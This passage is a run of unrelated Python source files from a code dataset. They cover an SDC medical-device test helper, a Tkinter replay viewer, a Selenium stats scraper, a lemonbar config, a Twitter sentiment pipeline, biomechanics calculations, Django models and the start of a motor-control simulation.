self.sdcDeviceCoCoFinal.startAll()\r\n self.sdcDeviceCoCoFinal.setLocation(self.cocoFinalLocation, self._locValidators)\r\n xAddr = self.sdcDeviceCoCoFinal.getXAddrs()\r\n self.sdcClientCocoFinal = SdcClient(xAddr[0],\r\n deviceType=self.sdcDeviceCoCoFinal.mdib.sdc_definitions.MedicalDeviceType,\r\n validate=True)\r\n self.sdcClientCocoFinal.startAll()\r\n\r\n def stopDraft10(self):\r\n self.sdcClientCocoFinal.stopAll()\r\n self.sdcDeviceCoCoFinal.stopAll()\r\n","sub_path":"tests/base_test.py","file_name":"base_test.py","file_ext":"py","file_size_in_byte":1605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"224695693","text":"import sys\nimport os\nimport numpy as np\nimport argparse\nimport glob\nimport time\nsys.path.append('.')\nfrom util.Data import DataLoader\nfrom tkinter import *\n\n\"\"\"\nARG PARSE\n\"\"\"\nparser = argparse.ArgumentParser()\n\nparser.add_argument('--backend', default='pytorch',help='DL backend')\nparser.add_argument('--data_paths', default=[],nargs='*',help='Data paths')\nparser.add_argument('--inference', default=False, help='Real time inference', action='store_true')\nparser.add_argument('--update_interval', default=10, type=int, help='Update interval (ms)')\nargs = parser.parse_args()\n\nbackend = args.backend\ndata_paths = args.data_paths\ninference = args.inference\nupdate_interval = args.update_interval\n\n\"\"\"\nMODEL INIT\n\"\"\"\nsys.path.append('./model')\nif backend == 'tensorflow':\n\n import tensorflow as tf\n from model import Model\n\n sess = tf.Session()\n m = Model()\n m.load(sess)\n\nelif backend == 'pytorch':\n\n from model_pytorch import Model\n\n m = Model()\n m.load()\n\n\ndef drawBoard(board,canvas,b_pix=20):\n canvas.delete('all')\n h, w = board.shape\n for i in range(h):\n for j in range(w):\n _v = board[i][j]\n if _v == 0:\n color = 'black'\n elif _v == 1:\n color = 'white'\n else:\n color = 'gray'\n canvas.create_rectangle(j * b_pix, i * b_pix, (j+1) * b_pix, (i+1) * b_pix, fill=color)\n\ndef drawPolicy(policy,canvas,blocksize=30,offset_x=10,offset_y=100):\n canvas.delete('all')\n for i, v in enumerate(policy):\n color = 'gray' + str(int(100*v))\n canvas.create_rectangle(offset_x+i*blocksize,offset_y,offset_x+(i+1)*blocksize,offset_y+blocksize,fill=color)\n\nindex = 0\n\nif __name__ == '__main__':\n master = Tk()\n master.title('Replay')\n\n list_of_data = []\n for path in data_paths:\n list_of_data += glob.glob(path)\n data = DataLoader(data_paths)\n\n canvas_frame = Frame(master)\n canvas_frame.grid(row=0,column=0,rowspan=10,columnspan=5)\n\n canvas_frame_2 = Frame(master)\n canvas_frame_2.grid(row=3,column=5,rowspan=7,columnspan=5)\n\n info_frame = Frame(master)\n info_frame.grid(row=0,column=5,rowspan=1,columnspan=5)\n\n control_frame = Frame(master)\n control_frame.grid(row=1,column=5,rowspan=1,columnspan=5)\n\n control_frame_2 = Frame(master)\n control_frame_2.grid(row=2,column=5,rowspan=1,columnspan=5)\n\n list_of_updates = []\n\n board_canvas = Canvas(canvas_frame,width=200,height=440)\n board_canvas.grid(row=1,column=1)\n def update_board_canvas(index):\n global data\n board = data.getBoard(index)\n drawBoard(board,board_canvas)\n list_of_updates.append(update_board_canvas)\n\n policy_canvas_label = Label(canvas_frame_2,text='Policy MCTS')\n policy_canvas_label.grid(row=0,column=0)\n policy_canvas = Canvas(canvas_frame_2,width=200,height=50)\n policy_canvas.grid(row=1,column=0)\n policy_canvas_label_2 = Label(canvas_frame_2,text='Policy prediction')\n policy_canvas_label_2.grid(row=2,column=0)\n policy_canvas_2 = Canvas(canvas_frame_2,width=200,height=50)\n policy_canvas_2.grid(row=3,column=0)\n value_label = Label(canvas_frame_2)\n value_label.grid(row=4,column=0)\n class_label = Label(canvas_frame_2)\n class_label.grid(row=5,column=0)\n def update_policy_canvas(index):\n global data\n policy = data.getPolicy(index)\n if inference:\n if backend == 'tensorflow':\n pred = m.inference(sess,[data.getBoard(index)[:,:,None]])\n value_pred = pred[0][0]\n policy_pred = pred[1][0]\n class_pred = np.argmax(pred[2][0])\n elif backend == 'pytorch':\n pred = m.inference(data.getBoard(index)[None,None,:,:])\n value_pred = pred[0][0][0]\n policy_pred = pred[1][0]\n class_pred = 0\n else:\n value_pred = -1\n policy_pred = np.empty((6,)) \n class_pred = 0\n drawPolicy(policy,policy_canvas,offset_y=0)\n drawPolicy(policy_pred,policy_canvas_2,offset_y=0)\n value_label.config(text='Value prediction: %.3f'%value_pred)\n class_label.config(text='Class prediction: %d'%class_pred)\n list_of_updates.append(update_policy_canvas)\n\n current_index_label = Label(info_frame)\n current_index_label.pack()\n def update_current_index_label(index):\n current_index_label.config(text='Current index: %d'%index)\n list_of_updates.append(update_current_index_label)\n\n current_cycle_label = Label(info_frame)\n current_cycle_label.pack()\n def update_current_cycle_label(index):\n global data\n current_cycle_label.config(text='Current cycle: %d'%data.getCycle(index))\n list_of_updates.append(update_current_cycle_label)\n \n current_score_label = Label(info_frame)\n current_score_label.pack()\n def update_current_score_label(index):\n global data\n current_score_label.config(text='Current score: %d'%data.getScore(index))\n list_of_updates.append(update_current_score_label)\n\n def next_index():\n global index\n index = data.bound_index(index+1)\n next_index_button = Button(control_frame,text='Next',command=next_index)\n next_index_button.grid(row=0,column=0)\n\n def prev_index():\n global index\n index = data.bound_index(index-1) \n prev_index_button = Button(control_frame,text='Prev',command=prev_index)\n prev_index_button.grid(row=0,column=1)\n\n play_after_id = None\n def play():\n global index\n global play_after_id\n index = data.bound_index(index+1)\n play_after_id = play_button.after(update_interval,play)\n play_button = Button(control_frame,text='Play',command=play)\n play_button.grid(row=0,column=2)\n\n def stop():\n global play_after_id\n if play_after_id:\n master.after_cancel(play_after_id)\n play_after_id = None\n stop_button = Button(control_frame,text='Stop',command=stop)\n stop_button.grid(row=0,column=3)\n\n\n index_entry_label = Label(control_frame_2,text='Goto index:')\n index_entry_label.grid(row=0,column=0)\n def set_index_entry(e):\n global index\n index = data.bound_index(int(index_entry.get()))\n print(index)\n index_entry = Entry(control_frame_2,width=10)\n index_entry.bind(\"\",set_index_entry)\n index_entry.grid(row=0,column=1)\n \n \"\"\"\n interval_entry_label = Label(control_frame_2,text='Update interval:')\n interval_entry_label.grid(row=1,column=0)\n def set_update_interval(e):\n global update_interval\n update_interval = int(interval_entry.get())\n interval_entry = Entry(control_frame_2,width=10)\n interval_entry.bind(\"\",set_update_interval)\n interval_entry.grid(row=1,column=1)\n \"\"\"\n def global_updater():\n global index\n for u in list_of_updates:\n u(index)\n master.after(update_interval, global_updater) \n master.after(update_interval, global_updater) \n mainloop()\n","sub_path":"tools/replay.py","file_name":"replay.py","file_ext":"py","file_size_in_byte":7069,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"297894494","text":"from selenium import webdriver\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.common.exceptions import TimeoutException\nimport time\nimport csv\n\nbrowser=webdriver.Firefox()\ntarget=open('2014Part2.csv', 'r')\ntarget=list(csv.reader(target))\ntime.sleep(4)\nfor line in target:\n\tpos=line[0]\n\tname=line[1]\n\tnameAndPos=name+\"_\"+pos+\"_\"\n\tprint(\"Extracting: \"+name)\n\tbrowser.get(line[2])\n\tdelay=3\n\ttry:\n\t\tWebDriverWait(browser, delay).until(EC.presence_of_element_located((By.XPATH, '//*[@id=\"page_content\"]/div[3]/div[1]/div/span[5]')))\n\t\tcsvElement=browser.find_element_by_xpath('//*[@id=\"page_content\"]/div[3]/div[1]/div/span[5]')\n\t\tfileName=nameAndPos+\"2014log.csv\"\n\t\tprint(\"Scraping for \"+fileName)\n\t\tif csvElement:\n\t\t\tcsvElement.click()\n\t\t\tcsvText=browser.find_element_by_xpath('//*[@id=\"csv_stats\"]').text.encode('utf-8')\n\t\t\ttotalCsvText=name+','+pos+csvText\n\t\t\ttarget=open(fileName, 'w')\n\t\t\ttarget.write(totalCsvText)\n\t\t\ttarget.close()\n\t\t\tprint(\"Done Extraction\")\n\texcept TimeoutException:\n\t\tprint(\"Took too long Or Couldnt Find\")","sub_path":"csvDownloader.py","file_name":"csvDownloader.py","file_ext":"py","file_size_in_byte":1160,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"191129508","text":"\n# format = '%{l}%[i3workspace]%{c}%[i3windowtitle]%{r}%[battery]%[date]%[time]%[volumestatus]'\nformat_display0 = '%{U#FFD79921}%{l}%[i3workspace]%{c}%[i3windowtitle]%{r}%[cpuload]%[networking]%[battery]%[volumestatus]%[date]%[time]'\nformat_display1 = '%{l}%[i3workspace]%{r}%[date]%[time]'\n#format_display0 = '%{U#FFD79921}%{l}%[bspwmworkspace]%{c}%[bspwmwindowtitle]%{r}%[cpuload]%[networking]%[battery]%[volumestatus]%[date]%[time]'\n#format_display1 = '%{l}%[bspwmworkspace]%{r}%[date]%[time]'\n\n# either i3wm or bspwm\nwm = 'i3wm'\n# sections = ['Battery', 'i3Workspace', 'i3WindowTitle', 'Date',\n# 'Time', 'VolumeStatus', 'Networking', 'CPULoad']\n\nsections = ['Battery', 'Date', 'i3Workspace', 'i3WindowTitle',\n 'Time', 'VolumeStatus', 'Networking', 'CPULoad']\n\nfont1 = 'Droid Sans Mono:size=18'\nfont2 = 'FontAwesome:size=22:charwidth=40'\nfont3 = 'Fontello:size=24:charwidth=40'\n#\n# font2 = 'FontAwesome:size=22:charwidth=40'\n# font3 = 'Fontello:size=24:charwidth=40'\n\ngeometry = 'x50+0+0'\nuoline_height = '4'\n\ngrey1 = '#FF1D1F21'\ngrey2 = '#FF282A2E'\ngrey3 = '#FF454A4F'\ngrey4 = '#FF89984'\nlight_grey = '#FFC5C8C6'\nx = '#FF454A4F'\ndark_green = '#FF8C9440'\nlight_green = '#FFB5BD68'\ndark_red = '#FFCC241D'\nlight_red = '#FFFB4934'\ndark_yellow = '#FFD79921'\nlight_yellow = '#FFFABD2F'\ndark_blue = '#FF458588'\nlight_blue = '#FF83A598'\n\nbg1 = grey1\nbg2 = grey2\nbg3 = grey3\nbg4 = light_grey\nbg5 = dark_green\nbg6 = light_green\nbg7 = dark_red\nbg8 = light_red\nbg9 = dark_yellow\nbg10 = light_yellow\nbg11 = dark_blue\nbg12 = light_blue\n\nfg1 = grey1\nfg2 = grey2\nfg3 = grey3\nfg4 = light_grey\nfg5 = dark_green\nfg6 = light_green\nfg7 = dark_red\nfg8 = light_red\nfg9 = dark_yellow\nfg10 = light_yellow\nfg11 = dark_blue\nfg12 = light_blue\n\ni3workspace_format = '%{T3}%s'\ni3workspace_format_focused = '%[bg6]%[fg1]%%{+u} %s %%{-u}'\ni3workspace_format_urgent = '%[bg9]%[fg1] %s '\ni3workspace_format_default = '%[fg1]%[bg5] %s '\ni3windowtitle_format = '%[fg4]%[bg1] %s '\ni3windowtitle_max_length = 80\n\nbspwmworkspace_format = '%{T3}%s'\nbspwmworkspace_format_focused = '%[bg6]%[fg1]%%{+u} %s %%{-u}'\nbspwmworkspace_format_urgent = '%[bg9]%[fg1] %s '\nbspwmworkspace_format_active = '%[fg1]%[bg5] %s '\nbspwmworkspace_format_inactive = '%[fg4]%[bg2] %s '\nbspwmworkspace_show_inactive = False\nbspwmworkspace_names = ['1 ', '2 ', '3 ', '4 ', '5 ',\n '6 ', '7 ', '8 ', '9 ', '0 ']\n\n\nbspwmwindowtitle_format = '%[fg4]%[bg1] %s '\nbspwmwindowtitle_max_length = 80\n\n\ncpuload_format = '%[bg1]%[fg6]%[fg4]%5s '\ncpuload_action1 = 'urxvt -geometry 200x60 -name htop -e htop'\n\nnetworking_format = '%[bg1]%[fg12] %[icon] %s'\nnetworking_icons_wireless = ['']\nnetworking_icons_wired = ['\\ue818']\nnetworking_action1 = 'nm-connection-editor'\n\nbattery_format = '%[bg1]%[icon_color] %[icon] %[fg4]%-3s '\nbattery_icons = ['', '', '', '', '']\nbattery_icon_colors = ['%[fg7]', '%[fg9]', '%[fg12]', '%[fg5]']\nbattery_action1 = 'xfce4-power-manager-settings'\n\nvolumestatus_format = '%[bg1]%[fg12] %[icon]%[fg4]%-3s '\nvolumestatus_icons = ['\\uf026', '\\uf027', '\\uf028']\nvolumestatus_action1 = 'pavucontrol'\nvolumestatus_action2 = 'pulse.py mute-toggle'\nvolumestatus_action4 = 'pulse.py +'\nvolumestatus_action5 = 'pulse.py -'\n\ndate_format = '%[fg1]%[bg5] %s'\ntime_format = ' %s '\n","sub_path":"lemonbar/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":3326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"604441884","text":"'''\nMake some simple test data for looking at the \nvarious transformations used to make more \ncomplex test data and the phaser-ng system \nitself.\n\n@author: Simon Wilshin\n@contact: swilshin@rvc.ac.uk\n@date: Mar 2013\n'''\n\nfrom numpy import arange,cos,sin,array\nfrom numpy.random import randn\n\ndef simpleTestData(s0=0.05, w0=0.05, N=10000,D=2,T=[0.0,0.0]):\n assert D>1, \"Cant make test data less than 2D in this way\"\n y = s0*randn(D,N)\n y = array([(1+y[0])*cos(w0*arange(y.shape[1])+y[1]),(1+y[0])*sin(w0*arange(y.shape[1])+y[1])]).T+T\n return(y)\n","sub_path":"formphase/phaserngutil/simpletestdata.py","file_name":"simpletestdata.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"61201615","text":"#!/usr/bin/env python\n# coding: utf-8\n\nimport os\nimport time\nfrom datetime import timedelta, datetime\n\nfrom textblob import TextBlob\nfrom tqdm import tqdm\n\nimport pygsheets\nimport tweepy\n\n\nclass Deployment:\n\n def __init__(self, base_directory, context):\n\n # Load in the twitter secrets and tokens from the environment variables\n self.consumer_key = os.environ['CONSUMER_KEY']\n self.consumer_secret = os.environ['CONSUMER_SECRET']\n self.access_token = os.environ['ACCESS_TOKEN']\n self.access_token_secret = os.environ['ACCESS_TOKEN_SECRET']\n\n # Set up the connection to twitter\n self.twitter_api = self.setup_twitter()\n\n # Setup the connection to Google, using the environment variable for the GOOGLE_CREDENTIALS\n # This method assumes you have an environment variable loaded with the content of the service account\n # credentials json\n self.google_sheet = pygsheets.authorize(service_account_env_var='GOOGLE_CREDENTIALS')\n\n # Set the spreadsheet_id from the environment variables\n self.spreadsheet_id = os.environ['SPREADSHEET_ID']\n\n # Set the day of today\n self.today = datetime.today()\n\n def setup_twitter(self):\n \"\"\"\n Use the Tweepy package to connect to the twitter API and return the connection object\n \"\"\"\n\n auth = tweepy.OAuthHandler(self.consumer_key, self.consumer_secret)\n auth.set_access_token(self.access_token, self.access_token_secret)\n api = tweepy.API(auth, wait_on_rate_limit=True, retry_count=2, retry_delay=240, timeout=120)\n\n try:\n api.verify_credentials()\n print(\"Authentication Twitter OK\")\n except tweepy.error.TweepError as e:\n print(f\"Error during authentication: {e}\")\n raise e\n\n return api\n\n def request(self, data):\n \"\"\"\n Make the request by first collecting the tweets and sentiments of a day and a certain hashtag and then\n inserting them in a Google sheet\n \"\"\"\n\n hashtag = data.get('hashtag', 'MlOps') # If no hashtag is given, use MlOps\n day = data.get('day', 'yesterday') # If no day is given, use 'yesterday'\n\n # Parse the user inputted day and retrieve the end date of the query ('until')\n day, until = self.parse_date(day=day)\n\n # Retrieve tweets from 'day' to 'until'\n texts = self.retrieve_tweets(hashtag=hashtag, day=day, until=until)\n\n # Determine the sentiment over the recovered tweets\n results = self.get_sentiment(texts=texts, day=day)\n\n # Append the values to the specified Google Sheet\n sheet = self.google_sheet.open_by_key(key=self.spreadsheet_id)\n # Open first worksheet of spreadsheet\n wk1 = sheet[0]\n # Values will be appended after the last non-filled row of the table without overwriting\n wk1.append_table(values=results, overwrite=False)\n\n return None\n\n def parse_date(self, day):\n \"\"\"\n Parse the user inputted date to be of yyyy-mm-dd and return the day and until date\n \"\"\"\n\n date_format = \"%Y-%m-%d\"\n\n if day == \"yesterday\":\n # Convert the day and until date to the correct string format\n day = (self.today - timedelta(days=1)).strftime(date_format)\n until = self.today.strftime(date_format)\n\n else:\n # Check if the given date is in the correct format and not longer than 7 days ago\n try:\n day = datetime.strptime(day, date_format)\n if day < (self.today - timedelta(days=8)):\n raise ValueError\n except ValueError:\n raise Exception(\n f\"Input for day is incorrect, it should be in the format of yyyy-mm-dd and should be no longer \"\n f\"than 7 days ago\")\n\n # Convert the day and until date to the correct string format\n until = (day + timedelta(days=1)).strftime(date_format)\n day = day.strftime(date_format)\n\n return day, until\n\n def retrieve_tweets(self, hashtag, day, until):\n \"\"\"\n Return the tweet texts with the hashtag 'hashtag' that were created in one day\n \"\"\"\n\n texts = []\n print(f\"Retrieving tweets between {day} and {until}\")\n\n retry = 0\n done = False\n\n # Query the Twitter api for all tweets on the specified hashtag and day and add them to a list\n while not done:\n try:\n for tweet in tqdm(tweepy.Cursor(\n self.twitter_api.search, q=hashtag, count=20, until=until, lang=\"en\", result_type=\"populair\"\n ).items()):\n if tweet.created_at.strftime(\"%Y-%m-%d\") == day:\n texts.append(tweet.text)\n done = True\n\n except tweepy.error.TweepError as e:\n # Retry after 60 seconds if the connection gets lost\n print(f\"Something went wrong while querying for tweets: {e}\")\n time.sleep(60)\n retry += 1\n if retry < 4:\n # Only make a maximum of 3 retry attempts\n print(f\"Retry attempt: {retry}\")\n continue\n raise e\n\n print(f\"{len(texts)} tweets retrieved\")\n return texts\n\n @staticmethod\n def get_sentiment(texts, day):\n \"\"\"\n Perform sentiment analysis over all retrieved tweets and return the overall results\n \"\"\"\n\n print(\"Calculating sentiment\")\n\n neutral_list = []\n positive_list = []\n negative_list = []\n\n for tweet in tqdm(texts):\n t = TextBlob(tweet).sentiment.polarity\n\n if t > 0.1:\n positive_list.append(t)\n elif t < -0.1:\n negative_list.append(t)\n else:\n neutral_list.append(t)\n\n print(f\"Sentiment calculated over {len(texts)} tweets from day {day}\")\n\n # Convert the day to the exact format necessary for the Tableau dashboard\n day = datetime.strptime(day, \"%Y-%m-%d\").strftime(\"%d-%m-%Y\")\n result = [day, len(positive_list), len(neutral_list), len(negative_list)]\n\n print(f\"Result: {result}\")\n return result\n","sub_path":"twitter-sentiment-analysis/twitter-sentiment-analysis/sentimentanalysis_deployment_package/deployment.py","file_name":"deployment.py","file_ext":"py","file_size_in_byte":6323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"538879678","text":"import re\n# Formatter\n\n#from coding.settings_local import STATIC_URL\nfrom oaa_examples_django.settings import STATIC_URL\n\n\ndef OAAMarkupToHTML(str):\n str1 = \"\"\n \n if str and len(str):\n str = str.replace(\"%s\", \"must\")\n \n code = \"\"\n for c in str:\n if c == '@':\n str1 += code;\n if code == \"\":\n code = \"\"\n else:\n code = \"\"\n else:\n str1 += c \n return str1\n\ndef OAAMarkupToText(str):\n str1 = \"\"\n\n if str and len(str):\n str = str.replace(\"%s\", \"must\")\n \n for c in str:\n if c != '@':\n str1 += c \n \n return str1\n\n\n\ndef HTMLToSourceCodeFormat(text):\n \"\"\"A filter to format the sample HTML for rendering the soruce code\"\"\"\n try:\n out = re.sub(r'&','&', text)\n out = re.sub(r'\\t', '  ', out)\n out = re.sub(r'<', '<', out)\n out = re.sub(r'>', '>', out)\n out = re.sub(r'<HL1>', '', out)\n out = re.sub(r'</HL1>', '', out)\n out = re.sub(r'<HL2>', '', out)\n out = re.sub(r'</HL2>', '', out)\n out = re.sub(r'\\n', '
\\n', out)\n out = re.sub(r' ', '  ', out)\n out = re.sub(r'{{EXAMPLE_MEDIA}}', STATIC_URL + 'examples/', out)\n return out\n except (TypeError, NameError, AttributeError):\n return ''\n\n\ndef OAAMarkupRemoveHighlightCode(text):\n\n \"\"\"Remove tags for highlighting for rendering the code as HTML.\"\"\"\n\n try:\n out = re.sub(r'', '', text)\n out = re.sub(r'', '', out)\n out = re.sub(r'', '', out)\n out = re.sub(r'', '', out)\n out = re.sub(r'{{EXAMPLE_MEDIA}}', STATIC_URL + 'examples/', out)\n return out\n except (TypeError, NameError, AttributeError):\n return ''\n\n ","sub_path":"utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":1849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"446158615","text":"import numpy as np\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport math\n\nclass BodyPart:\n def __init__(self, length,mass, CoM, Inertia,distal,proximal,time):\n self.time=time\n self.sample=len(distal[0])\n self.length=length\n self.CoM=CoM\n self.mass=mass\n self.Inertia=Inertia\n self.distal=distal\n self.proximal=proximal\n self.ProximForce=[np.zeros(self.sample),np.zeros(self.sample)]\n self.ProximMoment=np.zeros(self.sample)\n self.angle = np.zeros(self.sample)\n self.omega=np.zeros(self.sample)\n self.alpha=np.zeros(self.sample)\n self.velProxim=[np.zeros(self.sample),np.zeros(self.sample)]\n self.accelProxim=[np.zeros(self.sample),np.zeros(self.sample)]\n self.accelCoM=[np.zeros(self.sample),np.zeros(self.sample)]\n def absangle(self):\n unfil=np.zeros(self.sample)\n for i in range(0,self.sample):\n unfil[i]=np.arctan2((self.proximal[1][i]-self.distal[1][i]),(self.proximal[0][i]-self.distal[0][i]))\n self.angle=filterdata(unfil,5)\n return self.angle\n\n def omega(self): #j1 is joint angle dataframe #n is number of datapoints\n unfil=np.zeros(self.sample)\n BodyPart.absangle(self)\n for i in range(1,self.sample-1):\n unfil[i] = (self.angle[i+1]-self.angle[i-1])/(self.time[i+1]-self.time[i-1])\n self.omega=filterdata(unfil,5)\n return self.omega\n\n def alpha(self): #j1 is joint angle dataframe #n is number of datapoints \n BodyPart.omega(self)\n unfil=np.zeros(self.sample)\n for i in range(1,self.sample-1):\n unfil[i] = (self.omega[i+1]-self.omega[i-1])/(self.time[i+1]-self.time[i-1])\n self.alpha=filterdata(unfil,5)\n return self.alpha\n\n def velProxim(self): #j1 is joint angle dataframe #n is number of datapoints \n unfil=[np.zeros(self.sample),np.zeros(self.sample)]\n for i in range(1,self.sample-1):\n unfil[0][i] = (self.proximal[0][i+1]-self.proximal[0][i-1])/(self.time[i+1]-self.time[i-1])\n unfil[1][i] = (self.proximal[1][i+1]-self.proximal[1][i-1])/(self.time[i+1]-self.time[i-1])\n self.velProxim[0]=filterdata(unfil[0],5)/1000\n self.velProxim[1]=filterdata(unfil[1],5)/1000\n return self.velProxim\n \n def accelProxim(self): #j1 is joint angle dataframe #n is number of datapoin\n BodyPart.velProxim(self)\n unfil=[np.zeros(self.sample),np.zeros(self.sample)]\n for i in range(1,self.sample-1):\n unfil[0][i] = (self.velProxim[0][i+1]-self.velProxim[0][i-1])/(self.time[i+1]-self.time[i-1])\n unfil[1][i] = (self.velProxim[1][i+1]-self.velProxim[1][i-1])/(self.time[i+1]-self.time[i-1])\n self.accelProxim[0]=filterdata(unfil[0],5)\n self.accelProxim[1]=filterdata(unfil[1],5)\n return self.accelProxim\n \n def accelCoM(self):\n r=self.length-self.CoM\n BodyPart.accelProxim(self)\n BodyPart.alpha(self)\n unfil=[np.zeros(self.sample),np.zeros(self.sample)]\n for i in range(1,self.sample):\n unfil[0][i]=self.accelProxim[0][i]-(r*self.alpha[i]*math.sin(self.angle[i])+self.omega[i]*self.omega[i]*r*math.cos(self.angle[i]))\n unfil[1][i]=self.accelProxim[1][i]+r*self.alpha[i]*math.cos(self.angle[i])-self.omega[i]*self.omega[i]*r*math.sin(self.angle[i])\n self.accelCoM[0]=filterdata(unfil[0],5)\n self.accelCoM[1]=filterdata(unfil[1],5)\n return self.accelCoM \n\n def Forces(self,R,M):\n BodyPart.accelCoM(self)\n for i in range(1,self.sample):\n self.ProximForce[0][i]=R[0][i]+self.mass*self.accelCoM[0][i];\n self.ProximForce[1][i]=R[1][i]+self.mass*self.accelCoM[1][i]+self.mass*9.81;\n self.ProximMoment[i]=M[i]+R[0][i]*self.length*math.sin(self.angle[i])-R[1][i]*self.length*math.cos(self.angle[i])-self.mass*9.81*self.CoM*math.cos(self.angle[i])+(self.Inertia+self.mass*self.CoM*self.CoM)*self.alpha[i];\n return self.ProximForce,self.ProximMoment\n \ndef Power(omega1,omega2,M):\n Jw=omega2-omega1\n power=np.multiply(Jw,M)\n return power\n \n \ndef filterdata(y,n):\n from scipy.signal import filtfilt\n b = [1.0 / n] * n\n a = 1\n yy = filtfilt(b,a,y)\n return yy;\n\ndef AnthroData(weight,height):\n data=np.zeros(19)\n misc= (7.8*9.6*9.6*49.5)+(46.84*31.6*31.6*50.3)+2*(2.7*16.4*16.4*32.3)+2*(2.7*13.7*13.7*30.3)+2*(0.6*8.2*8.2*29.7) #sum of Icm of all the upper body parts\n data[0]= weight*68.2/100 #weight of UB\n data[1]= height*14.2/100 #height of com of UB from hip \n data[2]= data[0]*data[1]*data[1]+misc #moment for UB\n data[3]= weight*9.9/100#weight of thigh\n data[4]= height*25.4/100#height of thigh\n data[5]= data[4]*43.3/100#height of com thigh\n data[6]= data[3]*data[4]*data[4]*32.3/100#moment of thigh\n data[7]= weight*4.6/100#weight of shank\n data[8]= height*23.3/100#height of shank\n data[9]= data[8]*43/100 #height of com shank\n data[10]= data[7]*data[8]*data[8]*30.2/100 #moment of shank\n data[11]= weight*(1.4-0.361)/100#weight of foot\n data[12]= height*(11.7-3.53)/100 #height of foot\n data[13]= data[12]*50/100 #height of com foot\n data[14]= data[11]*data[12]*data[12]*47.5/100 #moment of foot\n data[15]=weight*.361/100 #weight of toe\n data[16]=height*3.53/100 #height of toe\n data[17]=data[16]/2 #height of com of toe\n data[18]=data[15]*data[16]*data[16]/12 #moment of toe\n return data","sub_path":"limb.py","file_name":"limb.py","file_ext":"py","file_size_in_byte":5523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"12395018","text":"from django.db import models\r\nfrom uuid import uuid4\r\nfrom .persona import Persona\r\nfrom tools.base import CreatedModifiedModel\r\n\r\n\r\nclass Capacitacion(CreatedModifiedModel):\r\n \"\"\"\r\n Describe una autorización para la utilización de una clase de máquina en\r\n el laboratorio. Una persona puede tener múltiples capacitaciones.\r\n La relación con el capacitador es opcional ya que no se tiene información\r\n de todas las capacitaciones.\r\n \"\"\"\r\n\r\n id = models.UUIDField(primary_key=True, default=uuid4, editable=False)\r\n persona = models.ForeignKey(\r\n Persona,\r\n related_name='capacitaciones',\r\n on_delete=models.CASCADE,\r\n help_text='el perfil de la persona capacitada'\r\n )\r\n\r\n capacitador = models.ForeignKey(\r\n Persona,\r\n related_name='capacitador_de',\r\n on_delete=models.SET_NULL,\r\n null=True,\r\n blank=True,\r\n help_text='la persona que realizó la capacitación'\r\n )\r\n\r\n clase_maquina = models.ForeignKey(\r\n 'maquinas.ClaseMaquina',\r\n verbose_name='clase de máquina',\r\n related_name='capacitaciones',\r\n on_delete=models.CASCADE,\r\n help_text='la clase de equipamiento sobre la que se capacitó'\r\n )\r\n\r\n fecha = models.DateField(\r\n help_text=('la fecha en que se realizó. en caso de que haya durado más '\r\n 'de una sesión, la fecha de la sesión final')\r\n )\r\n\r\n class Meta:\r\n verbose_name = 'capacitación'\r\n verbose_name_plural = 'capacitaciones'\r\n","sub_path":"perfiles/models/capacitacion.py","file_name":"capacitacion.py","file_ext":"py","file_size_in_byte":1546,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"328390644","text":"#!/usr/bin/python\n# coding: utf-8\n\n# Author: LE YUAN\n# Date: 2020-08-10\n\n\nimport os\nimport csv\nimport json\n\noutfile = open(\"./substrate_results.tsv\", \"wt\")\ntsv_writer = csv.writer(outfile, delimiter=\"\\t\")\ntsv_writer.writerow(['species', 'expansion', 'contraction', 'rapidly_evolving'])\n\n\nwith open(\"./summary_run_pub.txt\", \"r\") as file :\n lines = file.readlines()[1:]\n\nfor line in lines :\n data = line.strip().split('\\t')\n # print(data)\n species = data[0].replace('&', '_')\n expansion = data[1].split(' (')[0]\n contraction = data[4].split(' (')[0]\n rapidly_evolving = data[1].split(' (')[1][:-1]\n # print(expansion)\n # print(contraction)\n # print(rapidly_evolving)\n tsv_writer.writerow([species,expansion,contraction,rapidly_evolving])\n\noutfile.close()","sub_path":"evolution_analysis/code/gene_expansion_contraction/code/analyze_substrate/substrate_analysis.py","file_name":"substrate_analysis.py","file_ext":"py","file_size_in_byte":785,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"141734718","text":"# -*- coding:utf-8 -*-\r\n# Author: washing\r\n# DateTime: 2022/9/17 22:14\r\n# File: 1624.py\r\n# Desc: \r\n\r\nclass Solution:\r\n def maxLengthBetweenEqualCharacters(self, s: str) -> int:\r\n ma = -1\r\n for idx in range(len(s)):\r\n ma = max(s.rfind(s[idx]) - idx, ma)\r\n return ma-1\r\n","sub_path":"Solutions/1624/1624.py","file_name":"1624.py","file_ext":"py","file_size_in_byte":303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"328781361","text":"import sys\nsys.path.append('../')\n\nimport numpy as np\nfrom simulation.simulation import *\n\ndef IPMSM_positioning(simulation_time, plant_parameters, control_parameters, external_inputs):\n\n # state parameters and data for plot\n id_data=[]\n iq_data=[]\n qm_data=[]\n dqm_data=[]\n qm_cmd_data=[]\n dqm_cmd_data=[]\n dqm_ref_data=[]\n id_cmd_data=[]\n iq_ref_data=[]\n qm_err_data=[]\n dqm_err_data=[]\n id_err_data=[]\n iq_err_data=[]\n time_data=[]\n\n 